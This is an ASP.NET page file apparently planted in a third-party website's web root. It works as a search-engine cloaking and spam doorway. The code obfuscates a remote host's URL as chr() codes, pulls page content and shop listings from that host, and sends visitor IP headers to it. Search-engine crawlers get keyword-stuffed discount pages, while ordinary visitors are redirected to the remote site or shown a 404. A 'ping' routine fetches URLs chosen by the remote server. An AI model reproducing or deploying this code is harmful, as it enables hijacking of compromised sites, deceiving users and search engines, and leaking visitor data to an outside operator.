File: C:/inetpub/vhosts/hrreflections.com/httpdocs/xdans.aspx
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
public static string chr(int asciiCode)
{ System.Text.ASCIIEncoding asciiEncoding = new System.Text.ASCIIEncoding();
byte[] byteArray = new byte[] { (byte)asciiCode };
string strCharacter = asciiEncoding.GetString(byteArray);
return (strCharacter);}
protected void Page_Load(object sender, EventArgs e)
{ httpxy = HttpContext.Current.Request.IsSecureConnection ? "https://" : "http://";
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
hyzhdy = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(97)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]);
if (!IsPostBack)
{ tz();
a = new Random(System.DateTime.Now.Millisecond);
int cid = Convert.ToInt32(webclient.DownloadString( hyzhdy + "/sjs.aspx"));
if (Request.QueryString["cid"] != null && Request.QueryString["cid"] != "") { cid = int.Parse(Request.QueryString["cid"]); }
gjc1 = webclient.DownloadString( hyzhdy + "/getci.aspx?cid=" + cid + "&s=2&e=4");
gjc2 = webclient.DownloadString( hyzhdy + "/getci.aspx?cid=" + cid + "&s=5&e=7");
ckwz = webclient.DownloadString( hyzhdy + "/wl.asp");
string pname = Request.CurrentExecutionFilePath;
dbhl = webclient.DownloadString( hyzhdy + "/ymsj/hl.aspx?page=" + pname);
if (Request.QueryString["type"] != null)
{
if (Request.QueryString["type"] == "addtocart")
{
content = webclient.DownloadString( hyzhdy + "/cart.aspx?gj=com");
content = content.Replace("pppid", Request.Form["pid"]);
content = content.Replace("tupian", Request.Form["pic"]);
content = content.Replace("mingzi", Request.Form["pname"]);
content = content.Replace("danjia", Request.Form["price"]);
content = content.Replace("shuliang", "1");
content = content.Replace("zongjia", Request.Form["price"]);
content = content.Replace("cima", Request.Form["s1"]);
content = content.Replace("curfh", Request.Form["fh"]);
content = content.Replace("pricetype", Request.Form["pricetype"]);
content = content.Replace("ZZZZZ", webclient.DownloadString( hyzhdy + "/xdz.txt"));
}
else if (Request.QueryString["type"] == "search")
{
string URL = hyzhdy + "/ymsj/GD_Page.aspx?cid=" + Request.QueryString["cid"] + "&xi=1-6&xc=19-26&searchtxt=" + Request.QueryString["searchtxt"] + "&you=0&page=" + pname;
content = webclient.DownloadString(URL);
}
}
else
{
if (Request.QueryString["zhzh"] != null)
{ gjc = Request.QueryString["zhzh"];
int wid = new Random().Next(1, 4108);
URL = hyzhdy + "/ymsj/GD_Page.aspx?cid=" + Request.QueryString["cid"] + "&shop=" + HttpUtility.UrlEncode(gjc) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pl=" + Request.QueryString["pl"] + "&pr=" + Request.QueryString["pr"] + "&you=" + Request.QueryString["you"] + "&mt=" + hyzhdy + "/ar/ar_"+wid+".txt";
}
else if (Request.QueryString["number"] != null)
{ URL = hyzhdy + "/ymsj/scp.aspx?cid=" + cid + "&number=" + Request.QueryString["number"] + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"];
content = webclient.DownloadString(URL);
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
content = content.Replace("shop=", "zhzh=");
Response.ContentType = "text/xml";
Response.Write(content);
Response.End();
}
else if (Request.QueryString["s"] != null)
{
content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(97)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(115)+chr(115)+chr(121)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120));
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
Response.ContentType = "text/xml";
Response.Write(content);
Response.End();
}
else if (Request.QueryString["ping"] != null)
{
content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(100)+chr(121)+chr(97)+chr(107)+chr(103)+chr(46)+chr(116)+chr(111)+chr(112)+chr(47)+chr(112)+chr(105)+chr(110)+chr(103)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]+"&cid="+Request.QueryString["cid"]);
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
string ping = webclient.DownloadString(content);
Response.Write(ping);
Response.Write(content);
Response.End();
}
else
{URL = hyzhdy + "/ymsj/GD_Page.aspx?cid=" + cid + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"] + "&you=0&page=" + pname;}
content = webclient.DownloadString(URL);
content = content.Replace("shop=", "zhzh=");
content = content.Replace("&pl=", "");
content = content.Replace("&you=0", "");
content = content.Replace("&you=", "");
content = content.Replace("HHHHH", pname);
content = content.Replace("BBBBB", HttpContext.Current.Request.Url.Host);
content = content.Replace("AAAAA", pname + "?gj=com&type=addtocart");
content = content.Replace("DDDDD", gjc);
content = content.Replace("QQQQQ", Request.Url.ToString());
}
}
}
public void tz()
{ string ip = System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_HOST"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_CLIENT_IP"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED"];
if (Request.QueryString["kk"] != null)
{
ip = "66.249.64.190";
}
string ipurl = hyzhdy + "/getdomain.aspx?rnd=1&ip=" + ip;
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
string domain = webclient.DownloadString(ipurl).ToLower();
if (domain.IndexOf("google") == -1 && domain.IndexOf("msn.com") == -1 && domain.IndexOf("yahoo.com") == -1 && domain.IndexOf("aol.com") == -1)
{
if (Request.QueryString["zhzh"] != null)
{
string tzurl = hyzhdy + "/a.aspx";
Response.Redirect(tzurl + "?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(Request.QueryString["zhzh"]) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pr=" + Request.QueryString["pr"] + "&ll=" + HttpContext.Current.Request.Url.Host);
Response.End();
}
else
{
Response.Redirect("/404.aspx");
Response.End();
}
}
}
public System.Net.WebClient webclient = null;
public string httpxy = "";
public string gjc="";
public string gjc1="";
public string gjc2="";
public string content = "";
public string hyzhdy="";
public string URL = "";
public System.Random a = null;
public string ckwz="";
public string dbhl="";
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" />
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title><%=gjc%> Off <%=a.Next(60,80)%>% - <%=HttpContext.Current.Request.Url.Host%></title>
<meta name="keywords" content="<%=gjc%>,<%=gjc1%>" />
<meta name="description" content="<%=gjc%>,<%=gjc2%>." />
<meta name="robots" content="index,follow,all" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="Robots" content="index, follows">
</head>
<body>
<%=content %>
<div><%=dbhl%> | <%=ckwz%></div>
</body>
</html>